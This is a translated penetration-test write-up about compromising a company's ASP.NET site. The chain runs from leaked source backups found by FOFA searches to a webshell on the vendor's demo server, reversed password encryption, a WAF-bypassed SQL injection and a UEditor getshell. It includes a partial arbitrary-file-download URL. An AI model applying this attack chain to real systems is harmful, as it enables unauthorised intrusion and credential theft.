Title: Practical penetration! How did I do a day with a broken station

0x00 Use keywords to get the target source code

One morning I received a temporary arrangement to conduct penetration tests on a company. This penetration gave a main domain name and there was no subdomain. After opening the target website, I first collected information on it.

Middleware : IIS 8.5

Enter admin and found that it was automatically added/

It means that its directory exists, so blindly guess a wave of files, login.aspx default.aspx main.aspx, etc.

Finally, the background login page was found under login.aspx. Isn't this a wave of weak passwords?

The account is locked after a trial operation

A familiar start, since that's the case, we can only try other methods.

Some information was found in the html code of the home page

Design and production? According to the following domain name, it is a website building company

Then, here's the point. IIS8.5+ASP.NET+site building system

Scan the backup file first

More than 400 ips are OK for this developer. Use the FOFA query tool to export in batches

Then we scan the backup file. Here I recommend my brother B’s scanner https://github.com/broken5/WebAliveScan

Batch survival scans and directory scans can be performed

I found the web.zip backup file below several sites.

After downloading, the target site files were compared. Basically consistent

0x01 Get the code and start auditing and hitting a wall many times

Then start the audit.

Put down sensitive operations at an interface WebClient.DownloadFile (remote file download)

Since this method needs to provide an absolute path. It's a headache, but I'm following the relevant parameters. Discover.

The method is called in another method.

And pass in Server.MapPath, which doesn’t require you to find an absolute path. The system has arranged it for you.

Then construct POC:

ashx/api.ashx?m=downloadfileFilePath=asmx.jpgWebUrl=http://***.cn/

Access address

The file exists, then the proof is feasible

Return to the target address

The file is fixed does not exist

Continue to go back to the code, audit other vulnerabilities also have multiple vulnerabilities in other interfaces. For example, ueditor remote crawling vulnerability

File renaming can getshell

However, these interfaces require login

This is a headache, and I plan to try to find SQL injection in some interfaces that do not require login.

Finally, SQL stitching was discovered somewhere.

But here IsSafeSqlString detection is called

Common symbols are basically stuck

0x02 Take the developer and find the general account reverse encryption and decryption algorithm

Since they are all using the same website building program, it is suspected that there is a built-in account for the program.

So I prepared to pass the loopholes I just audited. Start with the same program site

Finally, I successfully got the Webshell at a certain site

Check out the relevant information

It is actually a demonstration site group of the manufacturer, and all the site source codes of the developer are stored.

There should be many demonstration environments during the development process, and it is estimated that every customer has them.

I flipped through the server to the demo website of the target site

There are zip website backups and sql database backups in the root directory.

If the target site was directly relocated, the backend account password should be the same.

Download its SQL file. Search for relevant information

SQL statements inserted into the account were found. Its password is encrypted

cmd5 cannot be unlocked, so I looked at the ciphertext as 33-bit encryption.

However, during the login process, the password is transmitted after RSA encryption, while the backend is actually 33-bit md5 encryption.

Because of the source code, I tracked down the login method.

After the password is passed in, CommFun.EnPwd is called for encryption.

Tracking EnPwd method

It can be seen that the password passed in is RSA type, and RSA decryption is performed first, and then DES encryption is performed.

Track the DESEncrypt.Encrypt method.

Here is the Encrypt method encapsulated and passed in the encrypted key.

Its core encryption method is as follows

And, in this category. Also define decryption method

The encryption method and decryption method and key are obtained. Then you just need to pull it out and call it separately.

Decrypt the encrypted characters and get the result

Try to log in

I worked hard for a long time and it was in vain.

0x03 The dark willows and flowers will win the target shell

It is already 4 pm. Still no progress, ready to try to bypass SQL filtering.

At this moment, I found a SQL injection point.

A method receives two parameters, but only filters one parameter.

Quiz on the target website

Existing injection, it was found that waf was successfully filled with garbage parameters.

Go to SQLmap and run with peace of mind, get the system account and password

Decrypt the obtained ciphertext to obtain the result

Try to log in. Now that's right!

Finally come in!

After previous audits, many interfaces have been found to have vulnerabilities, and now they have successfully logged in. Wouldn't it just getshell?

Take it away directly by ueditor.

Successful shell

0x04 Summary

1. Add admin to display management backend after the target URL, and query the CMS information of the website at the bottom of the website 2. Bulk search of other websites of the CMS through fofa: body='xxxx system"country='CN'3. Batch export of the query website URL through the fofa query tool 4. Batch sensitive directory scan of the export website URL through WebAliveScan, and found that one of the websites had source code compression package leaks. 5. Perform local code audit of the website source code and found the following vulnerabilities: There is a vulnerability to download any file, and there is no need to log in to ashx/api.ashx?m=downloa dfileFilePath=asmx.jpgWebUrl=http://***.cn/ueditor editor remote file download vulnerability, need to log in, there is a SQL injection vulnerability, need to log in, and it is filtered 6. Get the webshell of one of the URLs through any file download vulnerability, and it is found that it is the site group system for the manufacturer's demonstration. 7. Through the webshell, you find that there are zip website backups and sql in the root directory of each website in the site group. Database backup, SQL statement contains the inserted username and password (password is 33 digits). All logins in the site group basically use the same username and password. 8. Through source code analysis, it was found that the login was encrypted through RSA+DES, and the encryption method and KEY value were found in the source code. 10. Write the decryption method through the encryption method in the source code and decrypt the HASH value, but log in, it is impossible to log in 11. Through source code audit, another SQL injection was found. Here, WAF intercepts and injects the user name through garbage filling data, and runs out the user name through SQLMAP. Through the above decryption method, the password hash value is decrypted, and the plaintext password is finally obtained. 12. Log in to the system through the obtained user name and password, and then obtains the original webshell link of the target system through the remote file download of the ueditor editor: https://xz.aliyun.com/t/8375